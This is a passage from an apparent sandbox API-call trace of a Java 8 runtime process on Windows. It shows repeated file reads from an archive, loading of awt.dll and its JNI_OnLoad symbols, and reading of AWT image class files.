lpNumberOfBytesRead=0x208b4d0*=0x2c3, lpOverlapped=0x0) returned 1 [0128.824] malloc (_Size=0x48) returned 0x12e5f060 [0128.824] malloc (_Size=0xa0) returned 0x12dac9c0 [0128.824] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412336, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54600502) returned 1 [0128.824] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.825] malloc (_Size=0x28) returned 0x12ddada0 [0128.825] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc01b3, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50069939) returned 1 [0128.825] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.825] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc01f8, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50070008) returned 1 [0128.825] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1e4, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b4d0*=0x1e4, lpOverlapped=0x0) returned 1 [0128.826] malloc (_Size=0x48) returned 0x12e5fe20 [0128.826] malloc (_Size=0xa0) returned 0x12dab9f0 [0128.826] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34122e1, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54600417) returned 1 [0128.826] ReadFile (in: hFile=0x134, lpBuffer=0x12dab9f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dab9f0*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.826] malloc (_Size=0x28) returned 0x12ddae60 [0128.827] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbff90, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50069392) returned 1 [0128.827] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.828] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbffd5, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50069461) returned 1 [0128.828] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1de, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b4d0*=0x1de, lpOverlapped=0x0) returned 1 [0128.829] malloc (_Size=0x48) returned 0x12e5f380 [0128.829] malloc (_Size=0xa0) returned 0x12dac440 [0128.829] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412289, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54600329) returned 1 [0128.829] ReadFile (in: hFile=0x134, lpBuffer=0x12dac440, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dac440*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.829] malloc (_Size=0x2b) returned 0x12ef4cd0 [0128.829] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbfc79, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50068601) returned 1 [0128.830] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.830] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbfcc1, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50068673) returned 1 [0128.830] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2cf, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208b4d0*=0x2cf, lpOverlapped=0x0) returned 1 [0128.831] malloc (_Size=0x48) returned 0x12e5f420 [0128.831] malloc (_Size=0xa0) returned 0x12dac860 [0128.831] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341222c, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54600236) returned 1 [0128.831] ReadFile (in: hFile=0x134, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.831] malloc (_Size=0x30) returned 0x12ed5bb0 [0128.831] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbfa0d, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50067981) returned 1 [0128.831] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.831] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbfa5a, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50068058) returned 1 [0128.831] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x21f, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b4d0*=0x21f, lpOverlapped=0x0) returned 1 [0128.833] malloc (_Size=0x48) returned 0x12e5f1a0 [0128.833] malloc (_Size=0xa0) returned 0x12dab260 [0128.833] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34121cf, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54600143) returned 1 [0128.833] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.833] malloc (_Size=0x30) returned 0x12ef4cd0 [0128.833] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbf7a4, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50067364) returned 1 [0128.833] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.833] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbf7f1, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50067441) returned 1 [0128.833] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b4d0*=0x21c, lpOverlapped=0x0) returned 1 [0128.834] malloc (_Size=0x48) returned 0x12e5ff60 [0128.834] malloc (_Size=0xa0) returned 0x12daaef0 [0128.834] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412171, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54600049) returned 1 [0128.834] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.835] malloc (_Size=0x31) returned 0x12ed5bb0 [0128.835] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbf532, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50066738) returned 1 [0128.835] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.835] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbf580, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50066816) returned 1 [0128.835] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9c0, nNumberOfBytesToRead=0x224, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9c0*, lpNumberOfBytesRead=0x208b4d0*=0x224, lpOverlapped=0x0) returned 1 [0128.836] malloc (_Size=0x48) returned 0x12e5f4c0 [0128.836] malloc (_Size=0xa0) returned 0x12dab890 [0128.836] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412112, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54599954) returned 1 [0128.836] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.836] malloc (_Size=0x32) returned 0x12ef4cd0 [0128.836] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbf26a, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50066026) returned 1 [0128.836] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.836] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbf2b9, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50066105) returned 1 [0128.836] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x279, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208b4d0*=0x279, lpOverlapped=0x0) returned 1 [0128.838] malloc (_Size=0x48) returned 0x12e60050 [0128.838] malloc (_Size=0xa0) returned 0x12dabc00 [0128.838] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34120b9, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54599865) returned 1 [0128.838] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.838] malloc (_Size=0x2c) returned 0x12ed5bb0 [0128.838] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbef2c, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50065196) returned 1 [0128.838] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.840] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbef75, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50065269) returned 1 [0128.840] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2f5, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208b4d0*=0x2f5, lpOverlapped=0x0) returned 1 [0128.841] malloc (_Size=0x48) returned 0x12e5f9c0 [0128.841] malloc (_Size=0xa0) returned 0x12dabc00 [0128.841] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341205e, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54599774) returned 1 [0128.841] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.841] malloc (_Size=0x2e) returned 0x12ef4cd0 [0128.842] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbeb83, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50064259) returned 1 [0128.842] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.842] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbebce, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50064334) returned 1 [0128.842] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x35e, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208b4d0*=0x35e, lpOverlapped=0x0) returned 1 [0128.843] malloc (_Size=0x48) returned 0x12e5f830 [0128.843] malloc (_Size=0xa0) returned 0x12dab9f0 [0128.843] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412009, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54599689) returned 1 [0128.843] ReadFile (in: hFile=0x134, lpBuffer=0x12dab9f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dab9f0*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.843] malloc (_Size=0x28) returned 0x12ddac20 [0128.844] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbe983, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50063747) returned 1 [0128.844] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.844] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbe9c8, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50063816) returned 1 [0128.844] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1bb, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b4d0*=0x1bb, lpOverlapped=0x0) returned 1 [0128.845] malloc (_Size=0x48) returned 0x12e5fd30 [0128.845] malloc (_Size=0xa0) returned 0x12dab260 [0128.845] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411fb4, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54599604) returned 1 [0128.845] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.845] malloc (_Size=0x28) returned 0x12ddac80 [0128.845] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbe75e, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50063198) returned 1 [0128.845] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.845] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbe7a3, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50063267) returned 1 [0128.845] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1e0, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b4d0*=0x1e0, lpOverlapped=0x0) returned 1 [0128.846] malloc (_Size=0x48) returned 0x12e5f830 [0128.847] malloc (_Size=0xa0) returned 0x12dac650 [0128.847] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411f5d, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54599517) returned 1 [0128.847] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.847] malloc (_Size=0x2a) returned 0x12ef4cd0 [0128.847] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbe558, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50062680) returned 1 [0128.847] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.847] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbe59f, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50062751) returned 1 [0128.847] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1bf, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b4d0*=0x1bf, lpOverlapped=0x0) returned 1 [0128.851] malloc (_Size=0x48) returned 0x12e5f8d0 [0128.851] malloc (_Size=0xa0) returned 0x12daaef0 [0128.851] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411f10, lpNewFilePointer=0x208c050, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c050*=54599440) returned 1 [0128.851] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c020, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208c020*=0xa0, lpOverlapped=0x0) returned 1 [0128.851] malloc (_Size=0x20) returned 0x12dda830 [0128.851] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbb8df, lpNewFilePointer=0x208bc50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc50*=50051295) returned 1 [0128.851] ReadFile (in: hFile=0x134, lpBuffer=0x208bca0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc20, lpOverlapped=0x0 | out: lpBuffer=0x208bca0*, lpNumberOfBytesRead=0x208bc20*=0x1e, lpOverlapped=0x0) returned 1 [0128.852] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbb91c, lpNewFilePointer=0x208bcb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcb0*=50051356) returned 1 [0128.852] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2c3c, lpNumberOfBytesRead=0x208bc80, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208bc80*=0x2c3c, lpOverlapped=0x0) returned 1 [0128.855] malloc (_Size=0x48) returned 0x12e5f880 [0128.855] malloc (_Size=0xa0) returned 0x12dabd60 [0128.855] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411ec1, lpNewFilePointer=0x208b980, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b980*=54599361) returned 1 [0128.855] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b950, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208b950*=0xa0, lpOverlapped=0x0) returned 1 [0128.855] malloc (_Size=0x22) returned 0x12dda650 [0128.856] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbb657, lpNewFilePointer=0x208b580, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b580*=50050647) returned 1 [0128.856] ReadFile (in: hFile=0x134, lpBuffer=0x208b5d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b550, lpOverlapped=0x0 | out: lpBuffer=0x208b5d0*, lpNumberOfBytesRead=0x208b550*=0x1e, lpOverlapped=0x0) returned 1 [0128.856] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fbb696, lpNewFilePointer=0x208b5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5e0*=50050710) returned 1 [0128.856] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x249, lpNumberOfBytesRead=0x208b5b0, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208b5b0*=0x249, lpOverlapped=0x0) returned 1 [0128.857] strlen (_Str="") returned 0x0 [0128.857] strlen (_Str=".dll") returned 0x4 [0128.857] strlen (_Str="") returned 0x0 [0128.857] strlen (_Str=".dll") returned 0x4 [0128.858] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7d5e70000 [0128.858] malloc (_Size=0x8) returned 0x121a5610 [0128.858] strlen (_Str="awt.dll") returned 0x7 [0128.858] malloc (_Size=0x8) returned 0x1322f240 [0128.858] strcpy (in: _Dest=0x1322f240, _Source="awt.dll" | out: _Dest="awt.dll") returned="awt.dll" [0128.858] free (_Block=0x121a5610) [0128.858] strlen (_Str="awt.dll") returned 0x7 [0128.858] strlen (_Str="awt") returned 0x3 [0128.858] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0128.858] malloc (_Size=0x12) returned 0x12f4e700 [0128.858] strncpy (in: _Dest=0x12f4e700, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoad") returned="_JNI_OnLoad" [0128.858] strcat (in: _Dest=0x12f4e700, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0128.858] strcat (in: _Dest=0x12f4e700, _Source="awt" | out: _Dest="_JNI_OnLoad_awt") returned="_JNI_OnLoad_awt" [0128.858] strcat (in: _Dest=0x12f4e700, _Source="@8" | out: _Dest="_JNI_OnLoad_awt@8") returned="_JNI_OnLoad_awt@8" [0128.858] free (_Block=0x12f4e700) [0128.858] strlen (_Str="awt") returned 0x3 [0128.858] strlen (_Str="JNI_OnLoad") returned 0xa [0128.858] malloc (_Size=0xf) returned 0x12f4e340 [0128.858] strcpy (in: _Dest=0x12f4e340, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0128.858] strcat (in: _Dest=0x12f4e340, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0128.859] strcat (in: _Dest=0x12f4e340, _Source="awt" | out: _Dest="JNI_OnLoad_awt") returned="JNI_OnLoad_awt" [0128.859] free (_Block=0x12f4e340) [0128.859] free (_Block=0x1322f240) [0128.859] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll") returned 0x2e [0128.859] malloc (_Size=0x68) returned 0x12ec3690 [0128.859] wcscpy (in: _Dest=0x12ec3690, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" [0128.859] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll", nBufferLength=0x9, lpBuffer=0x208ae58, lpFilePart=0x208ae50 | out: lpBuffer="", lpFilePart=0x208ae50*=0x0) returned 0x2f [0128.859] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\awt.dll"), fInfoLevelId=0x0, lpFileInformation=0x208abf0 | out: lpFileInformation=0x208abf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb165611, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb165611, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb165611, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1725c8)) returned 1 [0128.860] free (_Block=0x12ec3690) [0128.863] strlen (_Str="java/awt/image/DirectColorModel.class") returned 0x25 [0128.863] malloc (_Size=0x48) returned 0x12e5ef70 [0128.863] malloc (_Size=0xa0) returned 0x12dab9f0 [0128.863] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411e6e, lpNewFilePointer=0x208c2b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2b0*=54599278) returned 1 [0128.863] ReadFile (in: hFile=0x134, lpBuffer=0x12dab9f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c280, lpOverlapped=0x0 | out: lpBuffer=0x12dab9f0*, lpNumberOfBytesRead=0x208c280*=0xa0, lpOverlapped=0x0) returned 1 [0128.863] malloc (_Size=0x26) returned 0x12dda680 [0128.863] strlen (_Str="java/awt/image/DirectColorModel.class") returned 0x25 [0128.863] strcpy (in: _Dest=0x208c430, _Source="java/awt/image/DirectColorModel.class" | out: _Dest="java/awt/image/DirectColorModel.class") returned="java/awt/image/DirectColorModel.class" [0128.863] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb8c87, lpNewFilePointer=0x208beb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208beb0*=50039943) returned 1 [0128.863] ReadFile (in: hFile=0x134, lpBuffer=0x208bf00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208be80, lpOverlapped=0x0 | out: lpBuffer=0x208bf00*, lpNumberOfBytesRead=0x208be80*=0x1e, lpOverlapped=0x0) returned 1 [0128.895] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fb8cca, lpNewFilePointer=0x208bf10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf10*=50040010) returned 1 [0128.895] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x298d, lpNumberOfBytesRead=0x208bee0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208bee0*=0x298d, lpOverlapped=0x0) returned 1 [0128.896] free (_Block=0x12dda650) [0128.897] free (_Block=0x12e5f880) [0128.903] strlen (_Str="java/awt/image/PackedColorModel.class") returned 0x25 [0128.903] malloc (_Size=0x48) returned 0x12e5f830 [0128.903] malloc (_Size=0xa0) returned 0x12daaef0 [0128.903] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411e1b, lpNewFilePointer=0x208b870, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b870*=54599195) returned 1 [0128.903] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, 